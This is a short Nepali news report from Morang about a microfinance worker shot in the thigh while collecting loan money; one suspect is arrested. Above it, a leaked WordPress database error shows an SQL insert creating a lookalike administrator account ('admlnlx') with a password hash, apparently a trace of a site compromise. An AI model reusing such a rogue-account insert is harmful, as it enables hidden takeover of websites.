WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BN3ShUW41yxlFroYQy71hfcMOVHe.C1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:08:32', '', 'admlnlx', 'admlnlx')
मोरङ, माघ १२ –
मोरङको कछिया गाविसको कछिया बजारमा घनश्याम बहरदारमाथि गोली प्रहार भएको छ ।
जीवन विकास लघु वित्त संस्थामा काम गर्ने विराटनगर रंगेली–११ का बहरदारमाथि गोली प्रहार भएको प्रहरीले जनाएको छ । लघुवित्तको पैसा संकलन गर्न जाने क्रममा उहाँमाथि आक्रमण भएको हो ।
तिघ्रामा गोली लागेका उहाँको विराटनगर अस्पतालमा उपचार भैरहेको छ । घटनामा संलग्न भएको आशंकामा एक जनालाई पक्राउ गरिएको र घटनाको अनुसन्धान सुरु गरिएको प्रहरीले जनाएको छ ।